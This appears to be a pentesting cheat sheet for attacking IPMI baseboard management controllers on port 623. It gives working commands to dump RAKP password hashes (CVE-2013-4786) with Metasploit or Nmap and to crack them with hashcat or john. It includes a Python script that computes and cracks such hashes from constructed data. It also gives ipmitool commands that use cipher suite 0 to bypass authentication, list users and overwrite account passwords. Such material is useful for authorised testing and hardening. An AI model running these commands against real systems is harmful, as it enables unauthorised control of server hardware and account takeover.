IPMI
Port: 623
Protocol: udp/tcp (IPMI over LAN, i.e. RMCP/RMCP+, runs on UDP 623; this is what ipmitool -I lanplus speaks)
Dump hash
A flaw in the IPMI 2.0 RAKP authentication exchange (CVE-2013-4786) lets an unauthenticated client retrieve a salted password hash for any existing user: the BMC answers RAKP Message 1 with RAKP Message 2, which contains HMAC-SHA1 keyed with the user's password over values that are all sent in clear, before the client has proven anything. Only a valid username is needed, so default accounts (root, ADMIN, admin, Administrator, USERID) are worth trying first; the Metasploit module below tries a list of common usernames on its own.
# MSF (set OUTPUT_HASHCAT_FILE / OUTPUT_JOHN_FILE to save the hashes in a crackable format)
use auxiliary/scanner/ipmi/ipmi_dumphashes
# Nmap
https://github.com/cldrn/external-nse-script-library/blob/master/ipmi-dump-hashes.nse
The hashes can be cracked offline with hashcat (mode 7300, "IPMI2 RAKP HMAC-SHA1") or john (--format=rakp). The file names below are placeholders:
hashcat -m 7300 ipmi.hashcat wordlist.txt
john --format=rakp --wordlist=wordlist.txt ipmi.john
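To see why the dumped value can be cracked offline, the following added example (not from the original page or from any of the tools it mentions) recomputes the RAKP Message 2 authentication code exactly as the BMC does, writes it in the salt:hmac form that hashcat -m 7300 and john's rakp format consume, and runs a wordlist against it. All session IDs, random numbers, the GUID and the password are constructed test data, not captured traffic.

```python
"""
IPMI 2.0 RAKP Message 2 hash: how it is built and why it cracks offline.

Per the IPMI 2.0 spec, the BMC's RAKP Message 2 carries
    HMAC-SHA1(K_UID, SID_M || SID_C || R_M || R_C || GUID_C || Role_M || ULen_M || UName_M)
where K_UID is the user's password and every other field is sent in clear
during the session setup. An attacker who knows a username therefore gets a
salted hash without authenticating, then guesses passwords locally.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# Privilege levels used in the Role_M byte (IPMI 2.0 table 13-17).
ADMINISTRATOR = 0x04


def rakp2_salt(sid_m: bytes, sid_c: bytes, rand_m: bytes, rand_c: bytes,
               guid_c: bytes, role_m: int, username: bytes) -> bytes:
    """Concatenate the cleartext fields that the BMC HMACs in RAKP Message 2.

    Sizes: 4-byte session IDs, 16-byte random numbers, 16-byte BMC GUID,
    1-byte requested role, 1-byte username length, then the username.
    """
    if len(sid_m) != 4 or len(sid_c) != 4:
        raise ValueError("session IDs are 4 bytes")
    if len(rand_m) != 16 or len(rand_c) != 16 or len(guid_c) != 16:
        raise ValueError("random numbers and GUID are 16 bytes")
    if not 1 <= len(username) <= 16:
        raise ValueError("IPMI usernames are 1..16 bytes")
    return (sid_m + sid_c + rand_m + rand_c + guid_c
            + struct.pack("BB", role_m, len(username)) + username)


def rakp2_auth_code(password: bytes, salt: bytes) -> bytes:
    """Key Exchange Authentication Code: HMAC-SHA1 keyed with the password.

    HMAC zero-pads keys shorter than the block size, so the spec's
    'K_UID padded to 20 bytes' needs no explicit handling here.
    """
    return hmac.new(password, salt, hashlib.sha1).digest()


def hashcat_7300_line(salt: bytes, auth_code: bytes) -> str:
    """Format the leaked value as hex(salt):hex(hmac), the layout hashcat -m 7300
    and john --format=rakp expect (and what ipmi_dumphashes writes out)."""
    return f"{salt.hex()}:{auth_code.hex()}"


def crack_rakp(line: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline attack: recompute the HMAC for each candidate password and
    compare against the leaked code. No further packets to the BMC needed."""
    salt_hex, code_hex = line.split(":")
    salt, code = bytes.fromhex(salt_hex), bytes.fromhex(code_hex)
    for pw in candidates:
        if hmac.compare_digest(rakp2_auth_code(pw, salt), code):
            return pw
    return None


def simulate_leak(username: bytes = b"root", password: bytes = b"calvin") -> str:
    """Constructed RAKP exchange for a user with a weak password: returns the
    crackable line an attacker would obtain from RAKP Message 2."""
    sid_m = b"\xa4\xa3\xa2\xa0"            # console session ID (from RAKP 1)
    sid_c = b"\x02\x0b\x00\x00"            # BMC session ID (from Open Session resp.)
    rand_m = bytes(range(0x10, 0x20))      # console random number (RAKP 1)
    rand_c = bytes(range(0x30, 0x40))      # BMC random number (RAKP 2)
    guid_c = bytes(range(0x50, 0x60))      # BMC GUID (RAKP 2)
    salt = rakp2_salt(sid_m, sid_c, rand_m, rand_c, guid_c, ADMINISTRATOR, username)
    return hashcat_7300_line(salt, rakp2_auth_code(password, salt))


if __name__ == "__main__":
    leaked = simulate_leak()
    print("leaked RAKP hash:", leaked)
    wordlist = [b"password", b"ADMIN", b"PASSW0RD", b"calvin", b"changeme"]
    print("cracked password:", crack_rakp(leaked, wordlist))
```

The salt is long (58 bytes plus the username), which is why cracking one BMC does not help against another; but HMAC-SHA1 is fast, so weak or vendor default passwords fall in seconds.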
Cipher 0
IPMI 2.0 cipher suite 0 means no authentication, no integrity and no confidentiality. A BMC that still accepts it grants a session to any client that requests cipher suite 0 (ipmitool -C 0) regardless of the password supplied, which amounts to an authentication bypass. A valid username is still needed, since the account must exist; the password can be any string.
apt-get install ipmitool
ipmitool -I lanplus -C 0 -H ${ip} -U ${user} -P ${randomString} user list
# ID  Name    Callin  Link Auth  IPMI Msg  Channel Priv Limit
# 2   root    true    true       true      ADMINISTRATOR
# 3   Oper1   true    true       true      ADMINISTRATOR
Set password
# Using the Cipher 0 vulnerability (no valid password needed)
ipmitool -I lanplus -C 0 -H ${ip} -U ${user} -P ${randomString} user set password ${userId} abc123
# Otherwise, with a valid password (e.g. one cracked from the dumped hashes)
ipmitool -I lanplus -H ${ip} -U ${user} -P ${password} user set password ${userId} abc123
The ${userId} is the numeric ID shown in the first column of the user list output. Note that this overwrites the account's real password on a production BMC, so record the target account and agree on the change beforehand; IPMI passwords are limited to 16 bytes (20 with IPMI 2.0), and ipmitool accepts the length as an optional last argument.
Resources
Exploit IPMI
: https://book.hacktricks.xyz/pentesting/623-udp-ipmi